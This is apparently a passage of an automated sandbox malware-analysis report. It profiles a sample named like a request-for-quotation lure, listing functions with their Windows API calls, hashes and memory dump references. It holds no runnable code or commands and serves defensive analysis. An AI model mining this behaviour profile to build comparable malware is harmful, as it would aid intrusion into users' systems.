                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                    • Instruction ID: 8a661d61db741646e810f949562c9a8c13416fe492d3093c30657becf9dce33c
                    • Opcode Fuzzy Hash: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                    • Instruction Fuzzy Hash: 4AA15171701212CFCB29EF14C595A6AF7A4EF04704F54A2ADE90EBB292DB30AD16CF54
                    Function 00ECA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,00ECAA64), ref: 00ECA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                    • Instruction ID: e924c0e6d2b7ede0300d30b22e58376a407680092d1b2facd0585765e7cc6286
                    • Opcode Fuzzy Hash: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                    • Instruction Fuzzy Hash: A491C63090020A9BDF08DF60D582FE9FBB4BF44308F54A12DE88AB7151DF31699ADB91
                    Function 00E72E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E72EAE
                      • Part of subcall function 00E71DB3: GetClientRect.USER32(?,?), ref: 00E71DDC
                      • Part of subcall function 00E71DB3: GetWindowRect.USER32(?,?), ref: 00E71E1D
                      • Part of subcall function 00E71DB3: ScreenToClient.USER32(?,?), ref: 00E71E45
                    • GetDC.USER32 ref: 00EACF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EACF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00EACFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00EACFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00EACFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                    • Instruction ID: 9cf75e779a09f8e8eeef9cb9278aa6bc52124556d2040424ad7d526b21ecba72
                    • Opcode Fuzzy Hash: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                    • Instruction Fuzzy Hash: 2771A334504209DFCF218F64CC84AFA7BB6FF4E364F24926AEE55BA265C7319841DB60
                    Function 00EFC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                      • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC2E4
                    • ImageList_EndDrag.COMCTL32 ref: 00EFC2EA
                    • ReleaseCapture.USER32 ref: 00EFC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00EFC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: d3308c86a8c5057ff57e4253fc7bbdaa34a1a4529fd558c8442eecef3301afb9
                    • Instruction ID: cc68926f0dce6d5fe7bcc6b3b0c27cd49bceea9356e0c7cdd35596fd6aba611d
                    • Opcode Fuzzy Hash: d3308c86a8c5057ff57e4253fc7bbdaa34a1a4529fd558c8442eecef3301afb9
                    • Instruction Fuzzy Hash: E351AE70204308AFD714EF20C955F7A7BE5EF88314F10852DF695AB2E2CB71A948DB52
                    Function 00EE8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EFF910), ref: 00EE903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EFF910), ref: 00EE9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE91EB
                    • SysFreeString.OLEAUT32(?), ref: 00EE9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                    • Instruction ID: 480cfd1caaaa30bd5fc30ea6611c09b72bff4c2df1599619fa81bd73bde1789d
                    • Opcode Fuzzy Hash: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                    • Instruction Fuzzy Hash: DBF11771A00209EFDB04DF95C888EAEB7B9FF89315F109059F915BB292DB31AE45CB50
                    Function 00EEF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EEF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EEFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EEFD90
                    • CloseHandle.KERNEL32(?), ref: 00EEFDBF
                    • CloseHandle.KERNEL32(?), ref: 00EEFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: d0213cedbbfd880d10dfa61fbe415de790623357c45bcf75cf31c1c2777c3c20
                    • Instruction ID: 4581e4662996ba89fb1981c623fb242b4dfe0af17dbbec16d9cf60ec8c0d80d6
                    • Opcode Fuzzy Hash: d0213cedbbfd880d10dfa61fbe415de790623357c45bcf75cf31c1c2777c3c20
                    • Instruction Fuzzy Hash: B3E1D331204385DFCB14EF25C881B6ABBE1AF84354F14956DF899AB3A2DB31EC45CB52
                    Function 00ED4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                      • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00ED4FE2
                    • _wcscmp.LIBCMT ref: 00ED4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00ED5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                    • Instruction ID: 5e53962c27c090f80e207ed1c8c4215240bb3865bdce0cbdc8a23d0845172f8c
                    • Opcode Fuzzy Hash: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                    • Instruction Fuzzy Hash: 9E5176B25087859BC724EB60C8819DFB3DCEF84340F10592FF289E3191EF75A5898766
                    Function 00EF88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                    • Instruction ID: 7162fd67fc240092cd8aa32f3b64522c13c83cb1a62d0cbfd2cf3c0a1d8e4275
                    • Opcode Fuzzy Hash: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                    • Instruction Fuzzy Hash: 9851AF30A0064CBFDF249F248E85BB97BA5EF04364FA06116F715F61A1DF71A990DB81
                    Function 00E72B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC5C0
                    • DestroyIcon.USER32(00000000), ref: 00EAC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC5EC
                    • DestroyIcon.USER32(?), ref: 00EAC5FB
                      • Part of subcall function 00EFA71E: DeleteObject.GDI32(00000000), ref: 00EFA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                    • Instruction ID: 80cae0771693bc66061e210061972b9531a5eef069793ffe90b8bd77abc3698b
                    • Opcode Fuzzy Hash: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                    • Instruction Fuzzy Hash: A9516970A00209AFDB20DF25CC45BAA77E5EF59314F10952DFA06EB2A0DB70ED90DB50
                    Function 00EC9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ECAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAE77
                      • Part of subcall function 00ECAE57: GetCurrentThreadId.KERNEL32 ref: 00ECAE7E
                      • Part of subcall function 00ECAE57: AttachThreadInput.USER32(00000000,?,00EC9B65,?,00000001), ref: 00ECAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EC9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EC9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EC9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EC9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                    • Instruction ID: 424d0f42d744776db48f8e2b8a8d0eb74869b71f3ac4c99125d0f1928c0366f9
                    • Opcode Fuzzy Hash: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                    • Instruction Fuzzy Hash: F3112172900208BEF7106B22DC8DFAA3B2CEF8C755F110429F204BB0A1C9F35C51DAA4
                    Function 00EC8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E0C
                    • HeapAlloc.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E43
                    • GetCurrentProcess.KERNEL32(00EC8A84,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00EC8E74,00000000,00000000,00000000), ref: 00EC8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                    • Instruction ID: 08f2421a0396cff254ee8a32df7807bcdd7efa2e4ad3d51e0b2b1a4eff7567f0
                    • Opcode Fuzzy Hash: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                    • Instruction Fuzzy Hash: 1001AC75641304FFE610AB65DD89F673B6CEF89711F404421FA05EB2A2CA71D814CA20
                    Function 00EE9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    • Opcode ID: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                    • Instruction ID: 4b852b4fbefcd46ecedf91398f8bc85c687b44140fbbdb395eed8c0c3ead1992
                    • Opcode Fuzzy Hash: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                    • Instruction Fuzzy Hash: 1091BD71A00259ABDF24DFA6C848FAEB7F8EF85314F10915AF515BB282D7709905CFA0
                    Function 00EE9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                      • Part of subcall function 00EC7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                      • Part of subcall function 00EC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                      • Part of subcall function 00EC7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EE9B1B
                    • _memset.LIBCMT ref: 00EE9B28
                    • _memset.LIBCMT ref: 00EE9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00EE9C97
                    • CoTaskMemFree.OLE32(?), ref: 00EE9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 00EE9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                    • Instruction ID: 0a70f6d2744ff386f9ed364ebc4fe0e3838d73fabbbb82c35b7c4bb0e50e81a4
                    • Opcode Fuzzy Hash: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                    • Instruction Fuzzy Hash: 3D912771D0022DABDB10DFA5DC85ADEBBF8EF08710F20916AE519B7241DB719A45CFA0
                    Function 00EF6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF70C1
                    • _wcscat.LIBCMT ref: 00EF711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                    • Instruction ID: 5072cb75653128cc2ba8f077a9be24cc1f5234b9452aa5f6c9d047562ada2442
                    • Opcode Fuzzy Hash: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                    • Instruction Fuzzy Hash: 64417071A04308AFDB219F64CC85BFA77E8EF08354F10556AFA84E6191D6719D848B60
                    Function 00EEEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED3EB6
                      • Part of subcall function 00ED3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00ED3EC4
                      • Part of subcall function 00ED3E91: CloseHandle.KERNEL32(00000000), ref: 00ED3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECB8
                    • GetLastError.KERNEL32 ref: 00EEECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEED77
                    • GetLastError.KERNEL32(00000000), ref: 00EEED82
                    • CloseHandle.KERNEL32(00000000), ref: 00EEEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
